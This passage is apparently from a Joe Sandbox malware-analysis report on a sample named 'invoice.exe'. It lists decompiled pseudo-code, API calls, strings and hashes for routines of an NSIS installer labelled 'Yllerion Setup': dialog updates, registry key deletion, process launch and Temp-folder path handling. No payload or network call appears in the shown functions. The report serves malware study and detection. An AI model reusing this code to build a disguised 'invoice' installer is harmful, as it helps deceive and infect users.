                                            				void* _t32;
                                            				void* _t41;
                                            				signed int _t43;
                                            				signed int _t47;
                                            				signed int _t50;
                                            				signed int _t51;
                                            				signed int _t53;
                                            
                                            				_t21 = _a16;
                                            				_t51 = _a12;
                                            				_t41 = 0xffffffdc;
                                            				if(_t21 == 0) {
                                            					_push(0x14);
                                            					_pop(0);
                                            					_t22 = _t51;
                                            					if(_t51 < 0x100000) {
                                            						_push(0xa);
                                            						_pop(0);
                                            						_t41 = 0xffffffdd;
                                            					}
                                            					if(_t51 < 0x400) {
                                            						_t41 = 0xffffffde;
                                            					}
                                            					if(_t51 < 0xffff3333) {
                                            						_t50 = 0x14;
                                            						asm("cdq");
                                            						_t22 = 1 / _t50 + _t51;
                                            					}
                                            					_t23 = _t22 & 0x00ffffff;
                                            					_t53 = _t22 >> 0;
                                            					_t43 = 0xa;
                                            					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                            				} else {
                                            					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                            					_t47 = 0;
                                            				}
                                            				_t29 = E00405F87(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                            				_t31 = E00405F87(_t41, _t47, _t53,  &_v68, _t41);
                                            				_t32 = E00405F87(_t41, _t47, 0x42a870, 0x42a870, _a8);
                                            				wsprintfA(_t32 + lstrlenA(0x42a870), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                            				return SetDlgItemTextA( *0x42ebd8, _a4, 0x42a870);
                                            			}

                                            APIs
                                            • lstrlenA.KERNEL32(Yllerion Setup: Installing,Yllerion Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404768,000000DF,00000000,00000400,-00430000), ref: 004048EB
                                            • wsprintfA.USER32 ref: 004048F3
                                            • SetDlgItemTextA.USER32(?,Yllerion Setup: Installing), ref: 00404906
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s$Yllerion Setup: Installing
                                            • API String ID: 3540041739-850023234
                                            • Opcode ID: 54db272fd9225231769cced90d3b9a540a189ef805a7877c8ea43c669973e61d
                                            • Instruction ID: 46e1028d5dd9cf3fa3a12b124fa319e283dc00677a7b855ac62dacd231200cde
                                            • Opcode Fuzzy Hash: 54db272fd9225231769cced90d3b9a540a189ef805a7877c8ea43c669973e61d
                                            • Instruction Fuzzy Hash: 8D11E477A041282BEB0075699C41EBF3298DB82374F24463BFE65F21D1E979CC1246E9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00401D3B(int __edx) {
                                            				void* _t17;
                                            				struct HINSTANCE__* _t21;
                                            				struct HWND__* _t25;
                                            				void* _t27;
                                            
                                            				_t25 = GetDlgItem( *(_t27 - 8), __edx);
                                            				GetClientRect(_t25, _t27 - 0x48);
                                            				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402AC1(_t21), _t21,  *(_t27 - 0x40) *  *(_t27 - 0x20),  *(_t27 - 0x3c) *  *(_t27 - 0x20), 0x10));
                                            				if(_t17 != _t21) {
                                            					DeleteObject(_t17);
                                            				}
                                            				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t27 - 4));
                                            				return 0;
                                            			}

                                            APIs
                                            • GetDlgItem.USER32(?), ref: 00401D3F
                                            • GetClientRect.USER32(00000000,?), ref: 00401D4C
                                            • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
                                            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                                            • DeleteObject.GDI32(00000000), ref: 00401D8A
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: e7b13135481585f1ae21f8f3a2a21f2ebc81ae0f190e6cb519dc2edadbd9593c
                                            • Instruction ID: b94dd0b2fc2efe961c915ac3dbaedcbaa59703da1128c811c259d0727350af9e
                                            • Opcode Fuzzy Hash: e7b13135481585f1ae21f8f3a2a21f2ebc81ae0f190e6cb519dc2edadbd9593c
                                            • Instruction Fuzzy Hash: 6EF0FFB2600515BFDB00EBA4DE88DAFB7BCEB44301B04447AF645F2191CA748D018B38
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 59%
                                            			E00401C04(intOrPtr __edx) {
                                            				int _t29;
                                            				long _t30;
                                            				signed int _t32;
                                            				CHAR* _t35;
                                            				long _t36;
                                            				int _t41;
                                            				signed int _t42;
                                            				int _t46;
                                            				int _t56;
                                            				intOrPtr _t57;
                                            				struct HWND__* _t61;
                                            				void* _t64;
                                            
                                            				_t57 = __edx;
                                            				_t29 = E00402A9F(3);
                                            				 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
                                            				 *(_t64 - 8) = _t29;
                                            				_t30 = E00402A9F(4);
                                            				 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
                                            				 *(_t64 + 8) = _t30;
                                            				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                                            					 *((intOrPtr*)(__ebp - 8)) = E00402AC1(0x33);
                                            				}
                                            				__eflags =  *(_t64 - 0x14) & 0x00000002;
                                            				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                                            					 *(_t64 + 8) = E00402AC1(0x44);
                                            				}
                                            				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                                            				_push("true");
                                            				if(__eflags != 0) {
                                            					_t59 = E00402AC1();
                                            					_t32 = E00402AC1();
                                            					asm("sbb ecx, ecx");
                                            					asm("sbb eax, eax");
                                            					_t35 =  ~( *_t31) & _t59;
                                            					__eflags = _t35;
                                            					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                            					goto L10;
                                            				} else {
                                            					_t61 = E00402A9F();
                                            					 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
                                            					_t41 = E00402A9F(2);
                                            					 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
                                            					_t56 =  *(_t64 - 0x14) >> 2;
                                            					if(__eflags == 0) {
                                            						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
                                            						L10:
                                            						 *(_t64 - 0xc) = _t36;
                                            					} else {
                                            						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
                                            						asm("sbb eax, eax");
                                            						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                            					}
                                            				}
                                            				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                                            				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                                            					_push( *(_t64 - 0xc));
                                            					E00405EC3();
                                            				}
                                            				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t64 - 4));
                                            				return 0;
                                            			}

                                            APIs
                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            • Opcode ID: 8c877d5979cff4b3ce41adc99c27d6fc77d82e5cc3f5856b61787971cd0c7bbc
                                            • Instruction ID: bdc01a124477b6dd133b62af0939e03034df0dda3ad70936a50ebcebbcd9d6cc
                                            • Opcode Fuzzy Hash: 8c877d5979cff4b3ce41adc99c27d6fc77d82e5cc3f5856b61787971cd0c7bbc
                                            • Instruction Fuzzy Hash: 9F218F71A44209BEEB15DFA5D946AED7BB0EB84304F14803EF505F61D1DA7889408F28
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00403720() {
                                            				void* _t2;
                                            				void* _t3;
                                            				void* _t6;
                                            				void* _t8;
                                            
                                            				_t8 =  *0x429834; // 0x6b5d78
                                            				_t3 = E00403705(_t2, 0);
                                            				if(_t8 != 0) {
                                            					do {
                                            						_t6 = _t8;
                                            						_t8 =  *_t8;
                                            						_t1 = _t6 + 8; // 0x10000000
                                            						FreeLibrary( *_t1);
                                            						_t3 = GlobalFree(_t6);
                                            					} while (_t8 != 0);
                                            				}
                                            				 *0x429834 =  *0x429834 & 0x00000000;
                                            				return _t3;
                                            			}

                                            APIs
                                            • FreeLibrary.KERNEL32(10000000,76793410,00000000,C:\Users\user\AppData\Local\Temp\,004036F8,00403512,?,?,00000006,00000008,0000000A), ref: 0040373A
                                            • GlobalFree.KERNEL32(006B5D78), ref: 00403741
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: Free$GlobalLibrary
                                            • String ID: C:\Users\user\AppData\Local\Temp\$x]k
                                            • API String ID: 1100898210-3408944413
                                            • Opcode ID: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
                                            • Instruction ID: 7d8ce370987dd57b7bf148727d206b09ac62311aee63c146eb442539f55f5a8e
                                            • Opcode Fuzzy Hash: 6450b972aff65fe59d26657d82cdbaa5e3cda0ee416f3077b3e42c8154ca0fa8
                                            • Instruction Fuzzy Hash: 39E0C27391212097C7313F54EE0871ABBA86F46B22F0A403AE8407B26487745C428BCC
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004058FD(CHAR* _a4) {
                                            				CHAR* _t7;
                                            
                                            				_t7 = _a4;
                                            				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                            					lstrcatA(_t7, 0x40a014);
                                            				}
                                            				return _t7;
                                            			}

                                            APIs
                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031DE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00405903
                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031DE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 0040590C
                                            • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 0040591D
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004058FD
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrcatlstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 2659869361-3355392842
                                            • Opcode ID: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                                            • Instruction ID: 647ad7e742d71b16062aa4f61d1124f0b3f0fcedfae467302285f0529c6cb9e2
                                            • Opcode Fuzzy Hash: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                                            • Instruction Fuzzy Hash: 46D0C9A2606A317AD21227159C09EDB6A4CCF57755B054076F640B61A1CA7C4D428BFE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 84%
                                            			E00402BB4(void* __eflags, void* _a4, char* _a8, signed int _a12) {
                                            				void* _v8;
                                            				char _v272;
                                            				void* _t19;
                                            				signed int _t26;
                                            				intOrPtr* _t28;
                                            				signed int _t33;
                                            				signed int _t34;
                                            				signed int _t35;
                                            
                                            				_t34 = _a12;
                                            				_t35 = _t34 & 0x00000300;
                                            				_t33 = _t34 & 0x00000001;
                                            				_t19 = E00405DEB(__eflags, _a4, _a8, _t35 | 0x00000008,  &_v8);
                                            				if(_t19 == 0) {
                                            					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                            						__eflags = _t33;
                                            						if(__eflags != 0) {
                                            							RegCloseKey(_v8);
                                            							return 1;
                                            						}
                                            						_t26 = E00402BB4(__eflags, _v8,  &_v272, _a12);
                                            						__eflags = _t26;
                                            						if(_t26 != 0) {
                                            							break;
                                            						}
                                            					}
                                            					RegCloseKey(_v8);
                                            					_t28 = E004062FD(3);
                                            					if(_t28 == 0) {
                                            						return RegDeleteKeyA(_a4, _a8);
                                            					}
                                            					return  *_t28(_a4, _a8, _t35, 0);
                                            				}
                                            				return _t19;
                                            			}












                                            APIs
                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C19
                                            • RegCloseKey.ADVAPI32(?), ref: 00402C22
                                            • RegCloseKey.ADVAPI32(?), ref: 00402C43
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: Close$Enum
                                            • String ID:
                                            • API String ID: 464197530-0
                                            • Opcode ID: 11be2661f8599cd0237f1c1554e4f8b4188825d64962de0b1740bf644c97f38e
                                            • Instruction ID: b62f4967d327be975f6bbb281b4945b449d6b6e398a7fc8ef6fb9c274ae0afe8
                                            • Opcode Fuzzy Hash: 11be2661f8599cd0237f1c1554e4f8b4188825d64962de0b1740bf644c97f38e
                                            • Instruction Fuzzy Hash: 9A118832500109BBEF01AF91CF09B9E3B79EF08341F104036BA05B50E0E7B4EE52AB68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00402CE4(intOrPtr _a4) {
                                            				long _t2;
                                            				struct HWND__* _t3;
                                            				struct HWND__* _t6;
                                            
                                            				if(_a4 == 0) {
                                            					__eflags =  *0x421428; // 0x0
                                            					if(__eflags == 0) {
                                            						_t2 = GetTickCount();
                                            						__eflags = _t2 -  *0x42f410;
                                            						if(_t2 >  *0x42f410) {
                                            							_t3 = CreateDialogParamA( *0x42f400, 0x6f, 0, E00402C61, 0);
                                            							 *0x421428 = _t3;
                                            							return ShowWindow(_t3, 5);
                                            						}
                                            						return _t2;
                                            					} else {
                                            						return E00406339(0);
                                            					}
                                            				} else {
                                            					_t6 =  *0x421428; // 0x0
                                            					if(_t6 != 0) {
                                            						_t6 = DestroyWindow(_t6);
                                            					}
                                            					 *0x421428 = 0;
                                            					return _t6;
                                            				}
                                            			}







                                            APIs
                                            • DestroyWindow.USER32(00000000,00000000,00402EC4,?), ref: 00402CF7
                                            • GetTickCount.KERNEL32 ref: 00402D15
                                            • CreateDialogParamA.USER32(0000006F,00000000,00402C61,00000000), ref: 00402D32
                                            • ShowWindow.USER32(00000000,00000005), ref: 00402D40
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                            • String ID:
                                            • API String ID: 2102729457-0
                                            • Opcode ID: 2469aab9b0bab78131693435c259bb338fdfc1179cff7f610c16a2f3c60769c5
                                            • Instruction ID: 5343e4f3fd542578671bd54a8d6f819db7b5394acccd132b40ed42660498aa91
                                            • Opcode Fuzzy Hash: 2469aab9b0bab78131693435c259bb338fdfc1179cff7f610c16a2f3c60769c5
                                            • Instruction Fuzzy Hash: 01F05430601521EBC7207F24FE8CA8F7A64BB08B11791047AF445B21F4DBB448C28B9C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 91%
                                            			E00405000(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                            				int _t11;
                                            				int _t15;
                                            				long _t16;
                                            
                                            				_t15 = _a8;
                                            				if(_t15 != 0x102) {
                                            					__eflags = _t15 - 0x200;
                                            					if(_t15 != 0x200) {
                                            						_t16 = _a16;
                                            						L7:
                                            						__eflags = _t15 - 0x419;
                                            						if(_t15 == 0x419) {
                                            							__eflags =  *0x42a85c - _t16; // 0x0
                                            							if(__eflags != 0) {
                                            								_push(_t16);
                                            								_push(6);
                                            								 *0x42a85c = _t16;
                                            								E004049D7();
                                            							}
                                            						}
                                            						L11:
                                            						return CallWindowProcA( *0x42a864, _a4, _t15, _a12, _t16);
                                            					}
                                            					_t11 = IsWindowVisible(_a4);
                                            					__eflags = _t11;
                                            					if(_t11 == 0) {
                                            						L10:
                                            						_t16 = _a16;
                                            						goto L11;
                                            					}
                                            					_t16 = E00404957(_a4, "true");
                                            					_t15 = 0x419;
                                            					goto L7;
                                            				}
                                            				if(_a12 == 0x20) {
                                            					E00404072(0x413);
                                            					return 0;
                                            				}
                                            				goto L10;
                                            			}







                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 0040502F
                                            • CallWindowProcA.USER32(?,?,?,?), ref: 00405080
                                              • Part of subcall function 00404072: SendMessageA.USER32(000103BC,00000000,00000000,00000000), ref: 00404084
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: Window$CallMessageProcSendVisible
                                            • String ID:
                                            • API String ID: 3748168415-3916222277
                                            • Opcode ID: 0b5703a8dab1bd1bd7dd9e2c337de487c6e053b4983eba3ecfb903a9c205ce24
                                            • Instruction ID: 2f0027df7ddfe28b71d6e39f600ecebaf2ba5c74aec8f2e947ae9809186c917a
                                            • Opcode Fuzzy Hash: 0b5703a8dab1bd1bd7dd9e2c337de487c6e053b4983eba3ecfb903a9c205ce24
                                            • Instruction Fuzzy Hash: 48017171500609ABDF205F51DD80E6F3B65EB84754F14403BFA01751D2C77A8CA29F9A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 53%
                                            			E004059EB(void* __eflags, intOrPtr _a4) {
                                            				int _t11;
                                            				signed char* _t12;
                                            				intOrPtr _t18;
                                            				intOrPtr* _t21;
                                            				void* _t22;
                                            
                                            				E00405F65(0x42bc78, _a4);
                                            				_t21 = E00405996(0x42bc78);
                                            				if(_t21 != 0) {
                                            					E004061CF(_t21);
                                            					if(( *0x42f41c & 0x00000080) == 0) {
                                            						L5:
                                            						_t22 = _t21 - 0x42bc78;
                                            						while(1) {
                                            							_t11 = lstrlenA(0x42bc78);
                                            							_push(0x42bc78);
                                            							if(_t11 <= _t22) {
                                            								break;
                                            							}
                                            							_t12 = E00406268();
                                            							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                            								E00405944(0x42bc78);
                                            								continue;
                                            							} else {
                                            								goto L1;
                                            							}
                                            						}
                                            						E004058FD();
                                            						return 0 | GetFileAttributesA(??) != 0xffffffff;
                                            					}
                                            					_t18 =  *_t21;
                                            					if(_t18 == 0 || _t18 == 0x5c) {
                                            						goto L1;
                                            					} else {
                                            						goto L5;
                                            					}
                                            				}
                                            				L1:
                                            				return 0;
                                            			}









                                            APIs
                                              • Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,Yllerion Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72
                                              • Part of subcall function 00405996: CharNextA.USER32(?,?,0042BC78,?,00405A02,0042BC78,0042BC78,76793410,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,76793410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059A4
                                              • Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059A9
                                              • Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059BD
                                            • lstrlenA.KERNEL32(0042BC78,00000000,0042BC78,0042BC78,76793410,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,76793410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A3E
                                            • GetFileAttributesA.KERNEL32(0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,00000000,0042BC78,0042BC78,76793410,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,76793410,C:\Users\user\AppData\Local\Temp\), ref: 00405A4E
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004059EB
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 3248276644-3355392842
                                            • Opcode ID: abce9bb9807016b4c276db8bae45b4b3eed95d690bc7d0fbdb1e72e6f8ad0fcb
                                            • Instruction ID: 1f06baf1138d21f74630751e728cacf5283a8138a78bcc2982ba797f27b9272c
                                            • Opcode Fuzzy Hash: abce9bb9807016b4c276db8bae45b4b3eed95d690bc7d0fbdb1e72e6f8ad0fcb
                                            • Instruction Fuzzy Hash: 53F0C831315DA256C622323A1D45AAF1B45CE87338709477FF891B12D2EB3C89439EBD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00405604(CHAR* _a4) {
                                            				struct _PROCESS_INFORMATION _v20;
                                            				int _t7;
                                            
                                            				0x42c078->cb = 0x44;
                                            				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c078,  &_v20);
                                            				if(_t7 != 0) {
                                            					CloseHandle(_v20.hThread);
                                            					return _v20.hProcess;
                                            				}
                                            				return _t7;
                                            			}






                                            APIs
                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C078,Error launching installer), ref: 0040562D
                                            • CloseHandle.KERNEL32(?), ref: 0040563A
                                            Strings
                                            • Error launching installer, xrefs: 00405617
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: CloseCreateHandleProcess
                                            • String ID: Error launching installer
                                            • API String ID: 3712363035-66219284
                                            • Opcode ID: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                                            • Instruction ID: a14d50d96640d218925096829ca07d1800dc2b789f456133151d87fd2ad2a836
                                            • Opcode Fuzzy Hash: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
                                            • Instruction Fuzzy Hash: 9EE046F0640209BFEB109FA0ED49F7F7AACEB00704F404921BD00F2290E67499088A7C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00405944(char* _a4) {
                                            				char* _t3;
                                            				char* _t5;
                                            
                                            				_t5 = _a4;
                                            				_t3 =  &(_t5[lstrlenA(_t5)]);
                                            				while( *_t3 != 0x5c) {
                                            					_t3 = CharPrevA(_t5, _t3);
                                            					if(_t3 > _t5) {
                                            						continue;
                                            					}
                                            					break;
                                            				}
                                            				 *_t3 =  *_t3 & 0x00000000;
                                            				return  &(_t3[1]);
                                            			}






                                            APIs
                                            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DB4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\invoice.exe,C:\Users\user\Desktop\invoice.exe,80000000,00000003), ref: 0040594A
                                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DB4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\invoice.exe,C:\Users\user\Desktop\invoice.exe,80000000,00000003), ref: 00405958
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
